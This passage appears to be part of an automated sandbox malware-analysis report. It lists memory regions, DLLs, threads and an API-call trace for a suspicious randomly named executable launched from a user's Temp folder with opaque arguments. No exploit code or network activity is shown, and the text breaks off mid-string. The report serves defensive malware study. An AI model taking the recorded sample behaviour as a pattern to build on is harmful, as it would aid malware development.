start_va = 0x75290000 end_va = 0x75297fff entry_point = 0x75290000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 28259 start_va = 0x74b20000 end_va = 0x74b27fff entry_point = 0x74b20000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 28260 start_va = 0x74c60000 end_va = 0x74c99fff entry_point = 0x74c60000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 28261 start_va = 0x753f0000 end_va = 0x753fbfff entry_point = 0x753f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 28262 start_va = 0x75420000 end_va = 0x7553cfff entry_point = 0x75420000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 28313 start_va = 0xde0000 end_va = 0xde2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000de0000" filename = "" Region: id = 28314 start_va = 0xdf0000 end_va = 0xdf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000df0000" filename = "" Region: id = 28315 start_va = 0x1140000 end_va = 0x117ffff entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 28316 start_va = 0x1250000 end_va = 0x134ffff entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Region: id = 28317 start_va = 0x73c40000 end_va = 0x73c4efff entry_point = 0x73c40000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 28318 start_va = 0x73c50000 end_va = 0x73c58fff entry_point = 0x73c50000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 28319 start_va = 0x73c60000 end_va = 0x73c70fff entry_point = 0x73c60000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 28320 start_va = 0x75220000 end_va = 0x75238fff entry_point = 0x75220000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 28321 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 28322 start_va = 0x73c30000 end_va = 0x73c3efff entry_point = 0x73c30000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 28323 start_va = 0x74ca0000 end_va = 0x74cc1fff entry_point = 0x74ca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 28437 start_va = 0x6e290000 end_va = 0x6e29cfff entry_point = 0x6e290000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 28500 start_va = 0x6dea0000 end_va = 0x6dea7fff entry_point = 0x6dea0000 region_type = mapped_file name = "schedcli.dll" filename = "\\Windows\\System32\\schedcli.dll" (normalized: "c:\\windows\\system32\\schedcli.dll") Region: id = 28501 start_va = 0x73880000 end_va = 0x73888fff entry_point = 0x73880000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 28502 start_va = 0x705d0000 end_va = 0x705dafff entry_point = 0x705d0000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 28651 start_va = 0x1350000 end_va = 0x14b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001350000" filename = "" Region: id = 28652 start_va = 0x6de70000 end_va = 0x6de99fff entry_point = 0x6de70000 region_type = mapped_file name = "wmipcima.dll" filename = "\\Windows\\System32\\wbem\\wmipcima.dll" (normalized: "c:\\windows\\system32\\wbem\\wmipcima.dll") Region: id = 28653 start_va = 0x75400000 end_va = 0x75411fff entry_point = 0x75400000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 28654 start_va = 0x75590000 end_va = 0x755b6fff entry_point = 0x75590000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 29056 start_va = 0xe00000 end_va = 0xe01fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e00000" filename = "" Region: id = 29057 start_va = 0x6dd70000 end_va = 0x6dd72fff entry_point = 0x6dd70000 region_type = mapped_file name = "wmi.dll" filename = "\\Windows\\System32\\wmi.dll" (normalized: "c:\\windows\\system32\\wmi.dll") Region: id = 29058 start_va = 0x75340000 end_va = 0x75368fff entry_point = 0x75340000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 29089 start_va = 0x73b50000 end_va = 0x73b74fff entry_point = 0x73b50000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 29090 start_va = 0x764b0000 end_va = 0x7664cfff entry_point = 0x764b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Thread: id = 409 os_tid = 0xe68 Thread: id = 421 os_tid = 0xa34 Thread: id = 423 os_tid = 0xb60 Thread: id = 424 os_tid = 0x518 Thread: id = 426 os_tid = 0xb14 Thread: id = 427 os_tid = 0xae4 Thread: id = 429 os_tid = 0xba8 Thread: id = 435 os_tid = 0xc4c Thread: id = 629 os_tid = 0xb5c Thread: id = 941 os_tid = 0xda8 Process: id = "309" image_name = "wspgagwn.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe" page_root = "0x7ea166c0" os_pid = "0xda0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "306" os_parent_pid = "0xaa0" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 23975 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 23976 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 23977 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 23978 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "wspgagwn.exe" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe") Region: id = 23979 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 23980 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 23981 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 23982 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 23983 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23984 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23985 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23986 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 23987 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 23988 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23989 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23990 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23991 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23992 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23993 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23994 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23995 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23996 start_va = 0x490000 end_va = 0x557fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 23997 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23998 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23999 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 24000 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 24001 start_va = 0x1e0000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 24002 start_va = 0x560000 end_va = 0x660fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 24003 start_va = 0x670000 end_va = 0x126ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 24024 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 24025 start_va = 0x1e0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 24026 start_va = 0x250000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 24027 start_va = 0x1270000 end_va = 0x134efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001270000" filename = "" Region: id = 24028 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 24029 start_va = 0x1c0000 end_va = 0x1c2fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 24030 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Thread: id = 410 os_tid = 0x618 [0174.380] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x9dd5eb40, dwHighDateTime=0x1d440a9)) [0174.380] GetCurrentProcessId () returned 0xda0 [0174.380] GetCurrentThreadId () returned 0x618 [0174.380] GetTickCount () returned 0x32ba1 [0174.380] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff74 | out: lpPerformanceCount=0x12ff74*=23116916611) returned 1 [0174.380] GetStartupInfoW (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x12ff84, hStdError=0x405b06)) [0174.380] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0174.381] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0174.381] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0174.381] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0174.381] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0174.381] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0174.382] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0174.382] GetCurrentThreadId () returned 0x618 [0174.382] GetStartupInfoW (in: lpStartupInfo=0x12febc | out: lpStartupInfo=0x12febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405699, hStdOutput=0x405a4c, hStdError=0x2507d0)) [0174.383] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0174.383] GetFileType (hFile=0x3) returned 0x0 [0174.383] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0174.383] GetFileType (hFile=0x7) returned 0x0 [0174.383] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0174.383] GetFileType (hFile=0xb) returned 0x0 [0174.383] SetHandleCount (uNumber=0x20) returned 0x20 [0174.383] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"" [0174.383] GetEnvironmentStringsW () returned 0x27fc70* [0174.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1033 [0174.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x2511f8, cbMultiByte=1033, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=C:=C:\\Users\\EEBsYm5\\Desktop", lpUsedDefaultChar=0x0) returned 1033 [0174.383] FreeEnvironmentStringsW (penv=0x27fc70) returned 1 [0174.383] GetLastError () returned 0x6 [0174.383] SetLastError (dwErrCode=0x6) [0174.383] GetLastError () returned 0x6 [0174.383] SetLastError (dwErrCode=0x6) [0174.383] GetLastError () returned 0x6 [0174.383] SetLastError (dwErrCode=0x6) [0174.383] GetACP () returned 0x4e4 [0174.383] GetLastError () returned 0x6 [0174.383] SetLastError (dwErrCode=0x6) [0174.383] IsValidCodePage (CodePage=0x4e4) returned 1 [0174.383] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe84 | out: lpCPInfo=0x12fe84) returned 1 [0174.383] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f950 | out: lpCPInfo=0x12f950) returned 1 [0174.383] GetLastError () returned 0x6 [0174.383] SetLastError (dwErrCode=0x6) [0174.383] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0174.384] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0174.384] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12f964 | out: lpCharType=0x12f964) returned 1 [0174.384] GetLastError () returned 0x6 [0174.384] SetLastError (dwErrCode=0x6) [0174.384] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0174.384] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꁚ﷎ശAĀ") returned 256 [0174.384] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꁚ﷎ശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0174.384] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꁚ﷎ശAĀ", cchSrc=256, lpDestStr=0x12f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0174.384] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x12fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x9e\xad\xe6\xfc\x